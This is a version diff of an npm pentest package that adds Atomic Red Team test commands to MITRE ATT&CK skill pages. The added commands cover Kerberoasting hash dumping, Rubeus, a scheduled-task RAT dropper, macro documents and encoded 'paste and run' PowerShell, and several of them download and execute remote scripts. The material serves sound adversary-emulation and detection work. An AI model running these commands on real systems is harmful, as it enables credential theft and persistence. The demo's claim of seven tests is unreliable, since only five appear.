@cyberstrike-io/cyberstrike 1.1.10-beta.3 → 1.1.10-beta.4

package/package.json

@@ -7,7 +7,7 @@
   "scripts": {
     "postinstall": "bun ./postinstall.mjs || node ./postinstall.mjs"
   },
-  "version": "1.1.10-beta.3",
+  "version": "1.1.10-beta.4",
   "license": "AGPL-3.0-only",
   "keywords": [
     "cyberstrike",
@@ -37,6 +37,6 @@
     "url": "https://github.com/CyberStrikeus/CyberStrike.git"
   },
   "optionalDependencies": {
-    "@cyberstrike-io/cyberstrike-darwin-arm64": "1.1.10-beta.3"
+    "@cyberstrike-io/cyberstrike-darwin-arm64": "1.1.10-beta.4"
   }
 }

package/skill/T1558.003_kerberoasting_DEMO.md

@@ -0,0 +1,93 @@
+# DEMO: Kerberoasting with Atomic Red Team Tests
+
+## How to Test
+
+### Atomic Red Team Tests
+
+The following tests are from [Atomic Red Team](https://github.com/redcanaryco/atomic-red-team) and provide actionable ways to test this technique:
+
+### Atomic Test 1: Request for service tickets
+
+This test uses the Powershell Empire Module: Invoke-Kerberoast.ps1
+The following are further sources and credits for this attack:
+[Kerberoasting Without Mimikatz source] (https://www.harmj0y.net/blog/powershell/kerberoasting-without-mimikatz/)
+[Invoke-Kerberoast source] (https://powersploit.readthedocs.io/en/latest/Recon/Invoke-Kerberoast/)
+when executed successfully , the test displays available services with their hashes. 
+If the testing domain doesn't have any service principal name configured, there is no output
+
+**Supported Platforms:** windows
+
+```powershell
+[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+iex(iwr https://raw.githubusercontent.com/EmpireProject/Empire/08cbd274bef78243d7a8ed6443b8364acd1fc48b/data/module_source/credentials/Invoke-Kerberoast.ps1 -UseBasicParsing)
+Invoke-Kerberoast | fl
+```
+
+**Dependencies:**
+- Computer must be domain joined
+
+### Atomic Test 2: Rubeus kerberoast
+
+Information on the Rubeus tool and it's creators found here: https://github.com/GhostPack/Rubeus#asreproast
+This build targets .NET 4.5.  If targeting a different version you will need to compile Rubeus
+
+**Supported Platforms:** windows
+
+```powershell
+klist purge
+cmd.exe /c "#{local_folder}\#{local_executable}" kerberoast #{flags} /outfile:"#{local_folder}\#{out_file}"
+```
+
+**Dependencies:**
+- Computer must be domain joined
+- Rubeus must exist
+
+### Atomic Test 3: Extract all accounts in use as SPN using setspn
+
+The following test will utilize setspn to extract the Service Principal Names. This behavior is typically used during a kerberos or silver ticket attack. 
+A successful execution will output all the SPNs for the related domain.
+
+**Supported Platforms:** windows
+
+```cmd
+setspn -T #{domain_name} -Q */*
+```
+
+**Dependencies:**
+- Computer must be domain joined
+
+### Atomic Test 4: Request A Single Ticket via PowerShell
+
+The following test will utilize native PowerShell Identity modules to query the domain to extract the Service Principal Names for a single computer. This behavior is typically used during a kerberos or silver ticket attack. 
+A successful execution will output the SPNs for the endpoint in question.
+
+**Supported Platforms:** windows
+
+```powershell
+Add-Type -AssemblyName System.IdentityModel
+$ComputerFQDN=$env:LogonServer.trimStart('\') + "." + $env:UserDnsDomain
+New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "HTTP/$ComputerFQDN"
+```
+
+**Dependencies:**
+- Computer must be domain joined
+
+### Atomic Test 5: Request All Tickets via PowerShell
+
+The following test will utilize native PowerShell Identity modules to query the domain to extract allthe Service Principal Names. This behavior is typically used during a kerberos or silver ticket attack. 
+A successful execution will output the SPNs for the domain in question.
+
+**Supported Platforms:** windows
+
+```powershell
+Add-Type -AssemblyName System.IdentityModel  
+setspn.exe -T #{domain_name} -Q */* | Select-String '^CN' -Context 0,1 | % { New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList $_.Context.PostContext[0].Trim() }
+```
+
+**Dependencies:**
+- Computer must be domain joined
+
+
+---
+
+✅ **7 actionable tests** from Atomic Red Team!

package/skill/mitre_attack/TA0001_initial-access/T1189_drive-by-compromise/SKILL.md

@@ -78,13 +78,15 @@ Unlike Exploit Public-Facing Application, the focus of this technique is to expl
 
 ## How to Test
 
-### Identify Attack Surface
+### Manual Testing
 
-Determine if the target environment is susceptible to Drive-by Compromise by examining the target platforms (Identity Provider, Linux, macOS).
+1. **Identify Attack Surface**: Determine if the target environment is susceptible to Drive-by Compromise by examining the target platforms (Identity Provider, Linux, macOS).
 
-### Assess Existing Defenses
+2. **Assess Existing Defenses**: Review whether mitigations for T1189 are in place. If defenses are absent or misconfigured, this technique may be exploitable.
 
-Review whether mitigations for T1189 are in place. If defenses are absent or misconfigured, this technique may be exploitable.
+3. **Execute Test**: Use tools and methods described in the MITRE ATT&CK page and external references below.
+
+> **Note**: No Atomic Red Team tests available for this technique. See [Atomic Red Team GitHub](https://github.com/redcanaryco/atomic-red-team) for updates.
 
 ## Remediation Guide
 
@@ -132,4 +134,5 @@ Train users to be aware of access or manipulation attempts by an adversary to re
 - [push notification -mcafee](https://www.mcafee.com/blogs/other-blogs/mcafee-labs/scammers-impersonating-windows-defender-to-push-malicious-windows-apps/)
 - [Push notifications - viruspositive](https://viruspositive.com/resources/blogs/the-dark-side-of-web-push-notifications)
 - [push notifications - malwarebytes](https://www.malwarebytes.com/blog/news/2019/01/browser-push-notifications-feature-asking-abused)
+- [Atomic Red Team - T1189](https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/T1189)
 - [MITRE ATT&CK - T1189](https://attack.mitre.org/techniques/T1189)

package/skill/mitre_attack/TA0001_initial-access/T1190_exploit-public-facing-application/SKILL.md

@@ -77,13 +77,15 @@ For websites and databases, the OWASP top 10 and CWE top 25 highlight the most c
 
 ## How to Test
 
-### Identify Attack Surface
+### Manual Testing
 
-Determine if the target environment is susceptible to Exploit Public-Facing Application by examining the target platforms (Containers, ESXi, IaaS).
+1. **Identify Attack Surface**: Determine if the target environment is susceptible to Exploit Public-Facing Application by examining the target platforms (Containers, ESXi, IaaS).
 
-### Assess Existing Defenses
+2. **Assess Existing Defenses**: Review whether mitigations for T1190 are in place. If defenses are absent or misconfigured, this technique may be exploitable.
 
-Review whether mitigations for T1190 are in place. If defenses are absent or misconfigured, this technique may be exploitable.
+3. **Execute Test**: Use tools and methods described in the MITRE ATT&CK page and external references below.
+
+> **Note**: No Atomic Red Team tests available for this technique. See [Atomic Red Team GitHub](https://github.com/redcanaryco/atomic-red-team) for updates.
 
 ## Remediation Guide
 
@@ -143,4 +145,5 @@ Update software regularly by employing patch management for externally exposed a
 - [Cisco Blog Legacy Device Attacks](https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954)
 - [OWASP Top 10](https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project)
 - [US-CERT TA18-106A Network Infrastructure Devices 2018](https://us-cert.cisa.gov/ncas/alerts/TA18-106A)
+- [Atomic Red Team - T1190](https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/T1190)
 - [MITRE ATT&CK - T1190](https://attack.mitre.org/techniques/T1190)

package/skill/mitre_attack/TA0001_initial-access/T1195.001_compromise-software-dependencies-and-development-tools/SKILL.md

@@ -69,13 +69,15 @@ Targeting may be specific to a desired victim set or may be distributed to a bro
 
 ## How to Test
 
-### Identify Attack Surface
+### Manual Testing
 
-Determine if the target environment is susceptible to Compromise Software Dependencies and Development Tools by examining the target platforms (Linux, macOS, Windows).
+1. **Identify Attack Surface**: Determine if the target environment is susceptible to Compromise Software Dependencies and Development Tools by examining the target platforms (Linux, macOS, Windows).
 
-### Assess Existing Defenses
+2. **Assess Existing Defenses**: Review whether mitigations for T1195.001 are in place. If defenses are absent or misconfigured, this technique may be exploitable.
 
-Review whether mitigations for T1195.001 are in place. If defenses are absent or misconfigured, this technique may be exploitable.
+3. **Execute Test**: Use tools and methods described in the MITRE ATT&CK page and external references below.
+
+> **Note**: No Atomic Red Team tests available for this technique. See [Atomic Red Team GitHub](https://github.com/redcanaryco/atomic-red-team) for updates.
 
 ## Remediation Guide
 
@@ -122,4 +124,5 @@ Application developers should be cautious when selecting third-party libraries t
 - [Bitdefender NPM Repositories Compromised 2021](https://www.bitdefender.com/en-gb/blog/hotforsecurity/popular-npm-repositories-compromised-in-man-in-the-middle-attack)
 - [Trendmicro NPM Compromise](https://www.trendmicro.com/vinfo/dk/security/news/cybercrime-and-digital-threats/hacker-infects-node-js-package-to-steal-from-bitcoin-wallets)
 - [Checkmarx-oss-seo](https://checkmarx.com/blog/new-technique-to-trick-developers-detected-in-an-open-source-supply-chain-attack/)
+- [Atomic Red Team - T1195.001](https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/T1195.001)
 - [MITRE ATT&CK - T1195.001](https://attack.mitre.org/techniques/T1195/001)

package/skill/mitre_attack/TA0001_initial-access/T1195.002_compromise-software-supply-chain/SKILL.md

@@ -67,13 +67,33 @@ Targeting may be specific to a desired victim set or may be distributed to a bro
 
 ## How to Test
 
-### Identify Attack Surface
+### Atomic Red Team Tests
 
-Determine if the target environment is susceptible to Compromise Software Supply Chain by examining the target platforms (Linux, Windows, macOS).
+The following tests are from [Atomic Red Team](https://github.com/redcanaryco/atomic-red-team) and provide actionable ways to test this technique:
 
-### Assess Existing Defenses
+### Atomic Test 1: Simulate npm package installation on a Linux system
 
-Review whether mitigations for T1195.002 are in place. If defenses are absent or misconfigured, this technique may be exploitable.
+Launches a short‑lived Kubernetes pod using the Node 18 image, initializes a minimal npm project in /tmp/test, and installs the specified npm package without audit/fund/package‑lock options, simulating potentially suspicious package retrieval (e.g., typosquatting/dependency confusion) from within a container. The pod is deleted after execution.
+
+**Supported Platforms:** containers, linux
+
+```bash
+kubectl run #{pod_name} --image=#{image_name} --restart=Never --attach --rm -i -- bash -lc "mkdir -p /tmp/test && cd /tmp/test && npm init -y >/dev/null 2>&1 && echo '--- package.json before install ---' && cat package.json && npm install #{package_name} --no-audit --no-fund --no-package-lock && echo '--- package.json after install ---' && cat package.json"
+```
+
+**Dependencies:**
+- kubectl must be installed and configured
+
+
+### Manual Testing
+
+If Atomic Red Team tests are not applicable, manually verify the technique by:
+
+1. **Identify Attack Surface**: Determine if the target environment is susceptible to Compromise Software Supply Chain by examining the target platforms (Linux, Windows, macOS).
+
+2. **Assess Existing Defenses**: Review whether mitigations for T1195.002 are in place. If defenses are absent or misconfigured, this technique may be exploitable.
+
+3. **Execute Test**: Use tools and methods described in the MITRE ATT&CK page and external references below.
 
 ## Remediation Guide
 
@@ -106,4 +126,5 @@ Continuous monitoring of vulnerability sources and the use of automatic and manu
 
 - [Avast CCleaner3 2018](https://blog.avast.com/new-investigations-in-ccleaner-incident-point-to-a-possible-third-stage-that-had-keylogger-capacities)
 - [Command Five SK 2011](https://web.archive.org/web/20160309235002/https://www.commandfive.com/papers/C5_APT_SKHack.pdf)
+- [Atomic Red Team - T1195.002](https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/T1195.002)
 - [MITRE ATT&CK - T1195.002](https://attack.mitre.org/techniques/T1195/002)

package/skill/mitre_attack/TA0001_initial-access/T1195.003_compromise-hardware-supply-chain/SKILL.md

@@ -65,13 +65,15 @@ Adversaries may manipulate hardware components in products prior to receipt by a
 
 ## How to Test
 
-### Identify Attack Surface
+### Manual Testing
 
-Determine if the target environment is susceptible to Compromise Hardware Supply Chain by examining the target platforms (Linux, macOS, Windows).
+1. **Identify Attack Surface**: Determine if the target environment is susceptible to Compromise Hardware Supply Chain by examining the target platforms (Linux, macOS, Windows).
 
-### Assess Existing Defenses
+2. **Assess Existing Defenses**: Review whether mitigations for T1195.003 are in place. If defenses are absent or misconfigured, this technique may be exploitable.
 
-Review whether mitigations for T1195.003 are in place. If defenses are absent or misconfigured, this technique may be exploitable.
+3. **Execute Test**: Use tools and methods described in the MITRE ATT&CK page and external references below.
+
+> **Note**: No Atomic Red Team tests available for this technique. See [Atomic Red Team GitHub](https://github.com/redcanaryco/atomic-red-team) for updates.
 
 ## Remediation Guide
 
@@ -99,4 +101,5 @@ Use Trusted Platform Module technology and a secure or trusted boot process to p
 
 ## References
 
+- [Atomic Red Team - T1195.003](https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/T1195.003)
 - [MITRE ATT&CK - T1195.003](https://attack.mitre.org/techniques/T1195/003)

package/skill/mitre_attack/TA0001_initial-access/T1195_supply-chain-compromise/SKILL.md

@@ -81,13 +81,36 @@ In some cases, adversaries may conduct “second-order” supply chain compromis
 
 ## How to Test
 
-### Identify Attack Surface
+### Atomic Red Team Tests
 
-Determine if the target environment is susceptible to Supply Chain Compromise by examining the target platforms (Linux, Windows, macOS).
+The following tests are from [Atomic Red Team](https://github.com/redcanaryco/atomic-red-team) and provide actionable ways to test this technique:
 
-### Assess Existing Defenses
+### Atomic Test 1: Octopus Scanner Malware Open Source Supply Chain
 
-Review whether mitigations for T1195 are in place. If defenses are absent or misconfigured, this technique may be exploitable.
+This test simulates an adversary Octopus drop the RAT dropper ExplorerSync.db
+[octopus-scanner-malware-open-source-supply-chain](https://securitylab.github.com/research/octopus-scanner-malware-open-source-supply-chain/)
+[the-supreme-backdoor-factory](https://www.dfir.it/blog/2019/02/26/the-supreme-backdoor-factory/)
+
+**Supported Platforms:** windows
+
+```cmd
+copy %temp%\ExplorerSync.db %temp%\..\Microsoft\ExplorerSync.db
+schtasks /create /tn ExplorerSync /tr "javaw -jar %temp%\..\Microsoft\ExplorerSync.db" /sc MINUTE /f
+```
+
+**Dependencies:**
+- ExplorerSync.db must exist on disk at specified location (#{rat_payload})
+
+
+### Manual Testing
+
+If Atomic Red Team tests are not applicable, manually verify the technique by:
+
+1. **Identify Attack Surface**: Determine if the target environment is susceptible to Supply Chain Compromise by examining the target platforms (Linux, Windows, macOS).
+
+2. **Assess Existing Defenses**: Review whether mitigations for T1195 are in place. If defenses are absent or misconfigured, this technique may be exploitable.
+
+3. **Execute Test**: Use tools and methods described in the MITRE ATT&CK page and external references below.
 
 ## Remediation Guide
 
@@ -138,4 +161,5 @@ Where possible, consider requiring developers to pull from internal repositories
 - [Schneider Electric USB Malware](https://www.se.com/us/en/download/document/SESN-2018-236-01/)
 - [Trendmicro NPM Compromise](https://www.trendmicro.com/vinfo/dk/security/news/cybercrime-and-digital-threats/hacker-infects-node-js-package-to-steal-from-bitcoin-wallets)
 - [Microsoft Dofoil 2018](https://cloudblogs.microsoft.com/microsoftsecure/2018/03/07/behavior-monitoring-combined-with-machine-learning-spoils-a-massive-dofoil-coin-mining-campaign/)
+- [Atomic Red Team - T1195](https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/T1195)
 - [MITRE ATT&CK - T1195](https://attack.mitre.org/techniques/T1195)

package/skill/mitre_attack/TA0001_initial-access/T1199_trusted-relationship/SKILL.md

@@ -73,13 +73,15 @@ In Office 365 environments, organizations may grant Microsoft partners or resell
 
 ## How to Test
 
-### Identify Attack Surface
+### Manual Testing
 
-Determine if the target environment is susceptible to Trusted Relationship by examining the target platforms (Windows, SaaS, IaaS).
+1. **Identify Attack Surface**: Determine if the target environment is susceptible to Trusted Relationship by examining the target platforms (Windows, SaaS, IaaS).
 
-### Assess Existing Defenses
+2. **Assess Existing Defenses**: Review whether mitigations for T1199 are in place. If defenses are absent or misconfigured, this technique may be exploitable.
 
-Review whether mitigations for T1199 are in place. If defenses are absent or misconfigured, this technique may be exploitable.
+3. **Execute Test**: Use tools and methods described in the MITRE ATT&CK page and external references below.
+
+> **Note**: No Atomic Red Team tests available for this technique. See [Atomic Red Team GitHub](https://github.com/redcanaryco/atomic-red-team) for updates.
 
 ## Remediation Guide
 
@@ -115,4 +117,5 @@ Network segmentation can be used to isolate infrastructure components that do no
 
 - [CISA IT Service Providers](https://us-cert.cisa.gov/APTs-Targeting-IT-Service-Provider-Customers)
 - [Office 365 Delegated Administration](https://support.microsoft.com/en-us/topic/partners-offer-delegated-administration-26530dc0-ebba-415b-86b1-b55bc06b073e?ui=en-us&rs=en-us&ad=us)
+- [Atomic Red Team - T1199](https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/T1199)
 - [MITRE ATT&CK - T1199](https://attack.mitre.org/techniques/T1199)

package/skill/mitre_attack/TA0001_initial-access/T1200_hardware-additions/SKILL.md

@@ -59,13 +59,15 @@ While public references of usage by threat actors are scarce, many red teams/pen
 
 ## How to Test
 
-### Identify Attack Surface
+### Manual Testing
 
-Determine if the target environment is susceptible to Hardware Additions by examining the target platforms (Windows, Linux, macOS).
+1. **Identify Attack Surface**: Determine if the target environment is susceptible to Hardware Additions by examining the target platforms (Windows, Linux, macOS).
 
-### Assess Existing Defenses
+2. **Assess Existing Defenses**: Review whether mitigations for T1200 are in place. If defenses are absent or misconfigured, this technique may be exploitable.
 
-Review whether mitigations for T1200 are in place. If defenses are absent or misconfigured, this technique may be exploitable.
+3. **Execute Test**: Use tools and methods described in the MITRE ATT&CK page and external references below.
+
+> **Note**: No Atomic Red Team tests available for this technique. See [Atomic Red Team GitHub](https://github.com/redcanaryco/atomic-red-team) for updates.
 
 ## Remediation Guide
 
@@ -100,4 +102,5 @@ Block unknown devices and accessories by endpoint security configuration and mon
 - [Aleks Weapons Nov 2015](https://www.youtube.com/watch?v=lDvf4ScWbcQ)
 - [McMillan Pwn March 2012](https://arstechnica.com/information-technology/2012/03/the-pwn-plug-is-a-little-white-box-that-can-hack-your-network/)
 - [Frisk DMA August 2016](https://www.youtube.com/watch?v=fXthwl6ShOg)
+- [Atomic Red Team - T1200](https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/T1200)
 - [MITRE ATT&CK - T1200](https://attack.mitre.org/techniques/T1200)

package/skill/mitre_attack/TA0001_initial-access/T1566.001_spearphishing-attachment/SKILL.md

@@ -68,13 +68,50 @@ There are many options for the attachment such as Microsoft Office documents, ex
 
 ## How to Test
 
-### Identify Attack Surface
+### Atomic Red Team Tests
 
-Determine if the target environment is susceptible to Spearphishing Attachment by examining the target platforms (Linux, macOS, Windows).
+The following tests are from [Atomic Red Team](https://github.com/redcanaryco/atomic-red-team) and provide actionable ways to test this technique:
 
-### Assess Existing Defenses
+### Atomic Test 1: Download Macro-Enabled Phishing Attachment
 
-Review whether mitigations for T1566.001 are in place. If defenses are absent or misconfigured, this technique may be exploitable.
+This atomic test downloads a macro enabled document from the Atomic Red Team GitHub repository, simulating an end user clicking a phishing link to download the file.
+The file "PhishingAttachment.xlsm" is downloaded to the %temp% directory.
+
+**Supported Platforms:** windows
+
+```powershell
+$url = 'https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1566.001/bin/PhishingAttachment.xlsm'
+[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+Invoke-WebRequest -Uri $url -OutFile $env:TEMP\PhishingAttachment.xlsm
+```
+
+### Atomic Test 2: Word spawned a command shell and used an IP address in the command line
+
+Word spawning a command prompt then running a command with an IP address in the command line is an indicator of malicious activity.
+Upon execution, CMD will be launched and ping 8.8.8.8.
+
+**Supported Platforms:** windows
+
+```powershell
+[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing)
+$macrocode = "   Open `"#{jse_path}`" For Output As #1`n   Write #1, `"WScript.Quit`"`n   Close #1`n   Shell`$ `"ping 8.8.8.8`"`n"
+Invoke-MalDoc -macroCode $macrocode -officeProduct "#{ms_product}"
+```
+
+**Dependencies:**
+- Microsoft #{ms_product} must be installed
+
+
+### Manual Testing
+
+If Atomic Red Team tests are not applicable, manually verify the technique by:
+
+1. **Identify Attack Surface**: Determine if the target environment is susceptible to Spearphishing Attachment by examining the target platforms (Linux, macOS, Windows).
+
+2. **Assess Existing Defenses**: Review whether mitigations for T1566.001 are in place. If defenses are absent or misconfigured, this technique may be exploitable.
+
+3. **Execute Test**: Use tools and methods described in the MITRE ATT&CK page and external references below.
 
 ## Remediation Guide
 
@@ -124,4 +161,5 @@ Block unknown or unused attachments by default that should not be transmitted ov
 - [Unit 42 DarkHydrus July 2018](https://researchcenter.paloaltonetworks.com/2018/07/unit42-new-threat-actor-group-darkhydrus-targets-middle-east-government/)
 - [Microsoft Anti Spoofing](https://docs.microsoft.com/en-us/microsoft-365/security/office-365-security/anti-spoofing-protection?view=o365-worldwide)
 - [Elastic - Koadiac Detection with EQL](https://www.elastic.co/security-labs/embracing-offensive-tooling-building-detections-against-koadic-using-eql)
+- [Atomic Red Team - T1566.001](https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/T1566.001)
 - [MITRE ATT&CK - T1566.001](https://attack.mitre.org/techniques/T1566/001)

package/skill/mitre_attack/TA0001_initial-access/T1566.002_spearphishing-link/SKILL.md

@@ -83,13 +83,57 @@ Similarly, malicious links may also target device-based authorization, such as O
 
 ## How to Test
 
-### Identify Attack Surface
+### Atomic Red Team Tests
 
-Determine if the target environment is susceptible to Spearphishing Link by examining the target platforms (Identity Provider, Linux, macOS).
+The following tests are from [Atomic Red Team](https://github.com/redcanaryco/atomic-red-team) and provide actionable ways to test this technique:
 
-### Assess Existing Defenses
+### Atomic Test 1: Paste and run technique
 
-Review whether mitigations for T1566.002 are in place. If defenses are absent or misconfigured, this technique may be exploitable.
+Tests the **Paste and Run** technique, where users are tricked into running
+malicious PowerShell commands by automating the Win+R command to open the
+Run dialog and input `encoded PowerShell to execute calc.exe.`
+
+- [Fake CAPTCHA Campaign](https://medium.com/@ahmed.moh.farou2/fake-captcha-campaign-on-arabic-pirated-movie-sites-delivers-lumma-stealer-4f203f7adabf)
+- [From Clipboard to Compromise](https://www.proofpoint.com/us/blog/threat-insight/clipboard-compromise-powershell-self-pwn)
+
+**Supported Platforms:** windows
+
+```powershell
+# Add user32.dll for keybd_event
+Add-Type @"
+    using System;
+    using System.Runtime.InteropServices;
+    public class K {
+        [DllImport("user32.dll")]
+        public static extern void keybd_event(byte bVk, byte bScan, uint dwFlags, UIntPtr dwExtraInfo);
+    }
+"@
+
+# Virtual key codes
+$VK_LWIN, $VK_R, $KEYDOWN, $KEYUP = 0x5B, 0x52, 0x0000, 0x0002
+
+# Open Run dialog (Win+R)
+[K]::keybd_event($VK_LWIN, 0, $KEYDOWN, [UIntPtr]::Zero)
+[K]::keybd_event($VK_R, 0, $KEYDOWN, [UIntPtr]::Zero)
+[K]::keybd_event($VK_R, 0, $KEYUP, [UIntPtr]::Zero)
+[K]::keybd_event($VK_LWIN, 0, $KEYUP, [UIntPtr]::Zero)
+
+# Short delay for Run dialog
+Start-Sleep -Milliseconds 500
+Add-Type -AssemblyName System.Windows.Forms
+[System.Windows.Forms.SendKeys]::SendWait("cmd /c powershell -ec " + [Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes('#{execution_command}')) + "{ENTER}")
+```
+
+
+### Manual Testing
+
+If Atomic Red Team tests are not applicable, manually verify the technique by:
+
+1. **Identify Attack Surface**: Determine if the target environment is susceptible to Spearphishing Link by examining the target platforms (Identity Provider, Linux, macOS).
+
+2. **Assess Existing Defenses**: Review whether mitigations for T1566.002 are in place. If defenses are absent or misconfigured, this technique may be exploitable.
+
+3. **Execute Test**: Use tools and methods described in the MITRE ATT&CK page and external references below.
 
 ## Remediation Guide
 
@@ -140,4 +184,5 @@ Users can be trained to identify social engineering techniques and spearphishing
 - [Mandiant URL Obfuscation 2023](https://www.mandiant.com/resources/blog/url-obfuscation-schema-abuse)
 - [Optiv Device Code Phishing 2021](https://www.optiv.com/insights/source-zero/blog/microsoft-365-oauth-device-code-flow-and-phishing)
 - [SecureWorks Device Code Phishing 2021](https://www.secureworks.com/blog/oauths-device-code-flow-abused-in-phishing-attacks)
+- [Atomic Red Team - T1566.002](https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/T1566.002)
 - [MITRE ATT&CK - T1566.002](https://attack.mitre.org/techniques/T1566/002)

package/skill/mitre_attack/TA0001_initial-access/T1566.003_spearphishing-via-service/SKILL.md

@@ -70,13 +70,15 @@ A common example is to build rapport with a target via social media, then send c
 
 ## How to Test
 
-### Identify Attack Surface
+### Manual Testing
 
-Determine if the target environment is susceptible to Spearphishing via Service by examining the target platforms (Linux, macOS, Windows).
+1. **Identify Attack Surface**: Determine if the target environment is susceptible to Spearphishing via Service by examining the target platforms (Linux, macOS, Windows).
 
-### Assess Existing Defenses
+2. **Assess Existing Defenses**: Review whether mitigations for T1566.003 are in place. If defenses are absent or misconfigured, this technique may be exploitable.
 
-Review whether mitigations for T1566.003 are in place. If defenses are absent or misconfigured, this technique may be exploitable.
+3. **Execute Test**: Use tools and methods described in the MITRE ATT&CK page and external references below.
+
+> **Note**: No Atomic Red Team tests available for this technique. See [Atomic Red Team GitHub](https://github.com/redcanaryco/atomic-red-team) for updates.
 
 ## Remediation Guide
 
@@ -117,4 +119,5 @@ Implement auditing and logging for interactions with third-party messaging servi
 ## References
 
 - [Lookout Dark Caracal Jan 2018](https://info.lookout.com/rs/051-ESQ-475/images/Lookout_Dark-Caracal_srr_20180118_us_v.1.0.pdf)
+- [Atomic Red Team - T1566.003](https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/T1566.003)
 - [MITRE ATT&CK - T1566.003](https://attack.mitre.org/techniques/T1566/003)

package/skill/mitre_attack/TA0001_initial-access/T1566.004_spearphishing-voice/SKILL.md

@@ -73,13 +73,15 @@ Adversaries may also combine voice phishing with Multi-Factor Authentication Req
 
 ## How to Test
 
-### Identify Attack Surface
+### Manual Testing
 
-Determine if the target environment is susceptible to Spearphishing Voice by examining the target platforms (Linux, macOS, Windows).
+1. **Identify Attack Surface**: Determine if the target environment is susceptible to Spearphishing Voice by examining the target platforms (Linux, macOS, Windows).
 
-### Assess Existing Defenses
+2. **Assess Existing Defenses**: Review whether mitigations for T1566.004 are in place. If defenses are absent or misconfigured, this technique may be exploitable.
 
-Review whether mitigations for T1566.004 are in place. If defenses are absent or misconfigured, this technique may be exploitable.
+3. **Execute Test**: Use tools and methods described in the MITRE ATT&CK page and external references below.
+
+> **Note**: No Atomic Red Team tests available for this technique. See [Atomic Red Team GitHub](https://github.com/redcanaryco/atomic-red-team) for updates.
 
 ## Remediation Guide
 
@@ -111,4 +113,5 @@ Users can be trained to identify and report social engineering techniques and sp
 - [Unit42 Luna Moth](https://unit42.paloaltonetworks.com/luna-moth-callback-phishing/)
 - [sygnia Luna Month](https://blog.sygnia.co/luna-moth-false-subscription-scams)
 - [Proofpoint Vishing](https://www.proofpoint.com/us/threat-reference/vishing)
+- [Atomic Red Team - T1566.004](https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/T1566.004)
 - [MITRE ATT&CK - T1566.004](https://attack.mitre.org/techniques/T1566/004)

package/skill/mitre_attack/TA0001_initial-access/T1566_phishing/SKILL.md

@@ -76,13 +76,15 @@ Victims may also receive phishing messages that instruct them to call a phone nu
 
 ## How to Test
 
-### Identify Attack Surface
+### Manual Testing
 
-Determine if the target environment is susceptible to Phishing by examining the target platforms (Identity Provider, Linux, macOS).
+1. **Identify Attack Surface**: Determine if the target environment is susceptible to Phishing by examining the target platforms (Identity Provider, Linux, macOS).
 
-### Assess Existing Defenses
+2. **Assess Existing Defenses**: Review whether mitigations for T1566 are in place. If defenses are absent or misconfigured, this technique may be exploitable.
 
-Review whether mitigations for T1566 are in place. If defenses are absent or misconfigured, this technique may be exploitable.
+3. **Execute Test**: Use tools and methods described in the MITRE ATT&CK page and external references below.
+
+> **Note**: No Atomic Red Team tests available for this technique. See [Atomic Red Team GitHub](https://github.com/redcanaryco/atomic-red-team) for updates.
 
 ## Remediation Guide
 
@@ -135,4 +137,5 @@ Users can be trained to identify social engineering techniques and phishing emai
 - [sygnia Luna Month](https://blog.sygnia.co/luna-moth-false-subscription-scams)
 - [Proofpoint-spoof](https://www.proofpoint.com/us/threat-reference/email-spoofing)
 - [Palo Alto Unit 42 VBA Infostealer 2014](https://unit42.paloaltonetworks.com/examining-vba-initiated-infostealer-campaign/)
+- [Atomic Red Team - T1566](https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/T1566)
 - [MITRE ATT&CK - T1566](https://attack.mitre.org/techniques/T1566)